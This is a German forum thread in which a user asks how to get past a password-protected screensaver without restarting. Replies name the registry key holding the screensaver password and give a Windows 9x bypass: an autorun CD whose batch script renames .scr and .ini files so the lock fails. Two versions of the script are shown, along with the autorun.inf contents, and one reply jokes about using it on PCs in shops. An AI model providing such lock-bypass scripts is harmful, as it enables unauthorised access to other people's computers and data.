Universalpasswort für Bildschirmschoner?!

Also, ich möchte mal wissen, ob das Passwort von meinem Bildschirmschoner irgendwo gespeichert wir? Also, damit man das auch richtig versteht: Ich hab bei meinem PC ein passwort eingegeben, das man eingeben muss, wenn man wieder ins System will, nachdem der Bildschirmschoner aktiv wurde. Jetzt frage ich mich, ist das Passwort irgendwo gespeichert, oder gibt es irgendwelche Universalpasswörter, um trotzdem ins System zu kommen? Sagen wirs so, hab ich irgend eine Möglichkeit ins System zu kommen, nachdem der Bildschirmschoner mit dem Passwort aktiviert wurde(ohne Neustart!!! :D )???

THX

willst du etwa in irgenwelchen geschäften z.b vobis, saturn
ins system kommen ?! :D

@sirrius:

ich möchte mal wissen, ob das Passwort von meinem Bildschirmschoner irgendwo gespeichert wird

registry:
HKEY_USERSDefaultControlPanelDesktop
- Eintrag "ScreenSave_Data"

bei ganz alten rechnern kannst du mit viel glück sogar noch mittels affengriff den schoner ausser gefecht setzen. oder schlimmer -> einfach per "esc"!

_ONLY_try this_AT_HOME_,ok?

bei windows9x gibt es immernoch den trick mit der AutoRun CD

Schreib ne datei, die du in die autorun.inf schreibst: nopass.bat

in der datei steh:

Code:
@echo off
ren c:\windows\*.scr c:\windows\*.sc_
ren c:\windows\system\*.scr c:\windows\system\*.sc_
ren c:\windows\*.ini c:\windows\*.in_
pause
ren c:\windows\*.sc_ c:\windows\*.scr
ren c:\windows\system\*.sc_ c:\windows\system\*.scr
ren c:\windows\*.in_ c:\windows\*.ini
bewirkt: Die Dateien, die wichtig sein können werden von Win nimma gefunden.. hihi einfach masus bewegen und ende is... nun haste n fenster da, in dem steht, Drücken Sie ein beliebige Taste... oder so. einfach taste drücken und der grauss is vorbei :))

so it seems.
Du musst die oben angegebene Datei auf die CD schreiben, genau wie eine autorun.inf in der steht:

Code:
[AUTORUN]
OPEN=SCR.BAT

Und den code weiter oben musst du demnach in die datei SCR.BAT kopieren... und dann einfach ein bißchn hoffen. hehe :)

Hab das mal ausprobiert mit der scr.bat! Hab sie dann ausgeführt, dann steht da:

Syntaxfehler
Syntaxfehler
Syntaxfehler
Tast Drücken!

Ich habs noch nicht auf CD gebrannt, aber soll das so aussehen? Ich hoffe mal ja!

THX

*rofl*
nee, das soll natürlich nicht so aussehen. fehler sind in der regel immer falsch... naja, windoze is eben doch unflexibel... machen wir es also auf die harte Tour:

In die BAT muss demnach:

Code:
c:
cd \windows
ren *.ini *._ni
ren *.scr *._cr
cd \windows\system
ren *.scr *._cr
pause
ren *._cr *.scr
cd..
ren *._ni *.ini